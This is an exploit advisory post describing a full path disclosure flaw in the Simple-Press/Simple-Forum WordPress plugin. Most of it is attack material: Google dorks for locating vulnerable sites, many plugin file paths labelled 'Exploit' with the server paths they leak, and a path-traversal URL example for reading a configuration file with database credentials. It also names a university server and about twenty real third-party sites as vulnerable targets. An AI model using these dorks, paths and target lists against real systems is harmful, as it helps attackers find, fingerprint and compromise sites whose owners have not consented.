facebook facebook twitter rss

WordPress Simple-Press Simple-Forum Editors and TinyMCE Plugin Full Path Disclosure Vulnerability

Author: KingSkrupellos , Published: 09-10-2018
#################################################################################################

# Exploit Title : WordPress Simple-Press Simple-Forum Editors and TinyMCE Plugin Full Path Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/06/2018
# Vendor Homepages : simple-press.com/downloads/tinymce-editor-plugin/ - simplepressforum.com - northworks.ca - moxiecode.com
+ dsquaredmedia.co.uk - templatic.com - auvergne-rhone-alpes.developpement-durable.gouv.fr
+ cyberchimps.com/responsive-theme/ - wordpress.com/theme/mimbopro - uusiaalto.com - amesdesign.net
# Tested On : Windows and Linux
# Versions : WordPress 2.6 - 2.8 - 3.x - 4.2.2
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-200 [ Information Exposure ]
An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
+ CWE-399 [ Resource Management Errors ]
+ CWE-211 [ Information Exposure Through Externally-Generated Error Message ]
+ CWE-532 [ Information Exposure Through Log Files ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-199 [ Information Management Errors ]
#################################################################################################

# Description : Every forum needs a decent editor, and with TinyMCE you get just that.
Provide your users with the same editor as you find in the WordPress admin panel to allow for an all round more familiar and user friendly posting experience.

This editor can utilise two toolbars and also TinyMCE plugins, of which it comes pre supplied with all editing essentials
such as ‘bold’, ‘blockquote’, ‘spoiler’, ‘link’, ‘image’ and more. Settings allow you all the control you should need
including the essential option of rejecting posts with embedded formatting.

# Screenshot 1 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-1.png

# Screenshot 2 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-2.png

# According to Owasp Security Portal, Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/.
Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.

# Risk Factor : The risks regarding FPD may produce various outcomes. For example, if the webroot is getting leaked,
attackers may abuse the knowledge and use it in combination with file inclusion vulnerabilites
to steal configuration files regarding the web application or the rest of the operating system.

For Example : Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2

In combination with, say, unproteced use of the PHP function file_get_contents, the attacker gets an opportunity to steal configuration files.

The sourcecode of index.php:

<?php
   
echo file_get_contents(getcwd().$_GET['page']);
?>


An attacker crafts a URL like so: http://site.com/index.php?page=../../../../../../../home/example/public_html/includes/config.php
with the knowledge of the FPD in combination with Relative Path Traversal

<?php
   
//Hidden configuration file containing database credentials.
   
$hostname 'localhost';
   
$username 'root';
   
$password 'owasp_fpd';
   
$database 'example_site';
   
$connector mysql_connect($hostname$username$password);
   
mysql_select_db($database$connector);
?>


Disregarding the above sample, FPD can also be used to reveal the underlaying operation system by observing the file paths.
Windows for instance always start with a drive-letter, e.g; C:\, while Unix based operating system tend to start with a single front slash.

*NIX:

Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/alice/public_html/includes/functions.php on line 2
Microsoft Windows:

Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in C:\Users\bob\public_html\includes\functions.php on line 2
The FPD may reveal a lot more than people normally might suspect. The two examples above reveal usernames on the operating systems as well; "alice" and "bob".
Usernames are of course important pieces of credentials.
Attackers can use those in many different ways, ranging all from bruteforcing over various protocols (SSH, Telnet, RDP, FTP...)
to launching exploits requiring working usernames.

You can check here to full understand of the attack : owasp.org/index.php/Full_Path_Disclosure

#################################################################################################

# Google Dorks :

inurl:''/wp-content/plugins/simple-forum/editors/tinymce/''

intext:''proudly designed by dsquaredmedia.co.uk''

intext:''Website by NorthWorks''

intext:''Powered By WordPress | Voyage Theme''

intext:''Powered by WordPress & Mimbo Pro''

intext:''Web Site By dsixty''

intext:''© Mainostoimisto Underground Graphics 2012''

intext:''Grace Theme by Templatic"

intext:''développé avec WordPress pour la DREAL Auvergne''

intext:''Site designed by amesDesign''

intext:''Responsive Theme powered by WordPress''

#################################################################################################

Full Path Disclosure Vulnerabilities =>

# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php

Error : {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}}

# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php

Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP;
Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21

# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php

Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362

# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php

Error : Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9

Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15

# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9

# Exploit : /wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/sfa-framework.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php on line 10

# Exploit : /wp-content/plugins/simple-forum/admin/sfa-notice.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php on line 11

# Exploit : /wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php on line 11

# Exploit : /wp-content/plugins/simple-forum/sf-loader-admin.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php on line 10

# Exploit : /wp-content/plugins/simple-forum/template-tags/sf-widgets.php

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; WP_Widget_SPF has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/template-tags/sf-widgets.php on line 15
Access Denied

# Exploit : /wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php on line 10

# Exploit : /wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php on line 10

Exploit : /wp-content/plugins/simple-forum/help/documentation/database-script.sql

Database: simple:press forum Version 4.2.2

Exploit : /wp-content/plugins/simple-forum/install/install-error.log

Simple Forum İnstallation Log Files

Exploit : /wp-content/plugins/simple-forum/install/sf-install.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php on line 10

/wp-content/plugins/simple-forum/install/sf-upgrade.php

Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php on line 10

It gives same error :

/wp-login.php?action=login&view=forum
/wp-login.php?action=register&view=forum
/wp-login.php?action=lostpassword&view=forum
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/css/filemanager-tm.css.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-browse-tab.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-edit-tab.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-folder-tab.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-tinymce.js.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-upload-tab.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_file.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_process.php

Error : Your PHP installation appears to be missing the MySQL extension which is required by WordPress.

Found Templates by SimpleForum => /wp-content/plugins/simple-forum/editors/tinymce/plugins/inlinepopups/template.htm

#################################################################################################

# Example Site for Full Path Disclosure and SQL Injection Vulnerability =>

+ University of Washington - Departments Web Server Information Technology WebSite is Vulnerable.

Apache/2.2.32 (Unix) mod_ssl/2.2.32 OpenSSL/1.0.1e-fips mod_pubcookie/3.3.4a mod_uwa/3.2.1 Phusion_Passenger/3.0.11 Server at depts.washington.edu Port 80

depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php => [ Proof of Concept ] => archive.is/76tXR

Errors displaying on the page :

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362

Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9

Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9

Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 12

Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 13

Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 14

Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 15

Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 17

Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 18
{"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}}

#################################################################################################

Source [ My Topic ] => cyberizm.org/cyberizm-wordpress-simplepress-simpleforum-editors-tinymce-vuln.html

#################################################################################################

# Example Sites =>

depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
blogs.uprm.edu/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
americanclublyon.org/site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
ounasvaaranlatu.fi/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
alliancechristiancenter.org/development/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
churchoffrancisdesales.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
mudslingerevents.com/blog/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
preux-volley-ball.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
muenterprises.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
kjergaardsports.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
confemen.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
veda.com.ng/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
lisasee.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
soulographie.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
lunadanceinstitute.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
plaisance-port-leucate.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
shiatsu-angers.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
supremeroofing.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
automaxrecruitingandtraining.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
slulabservices.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :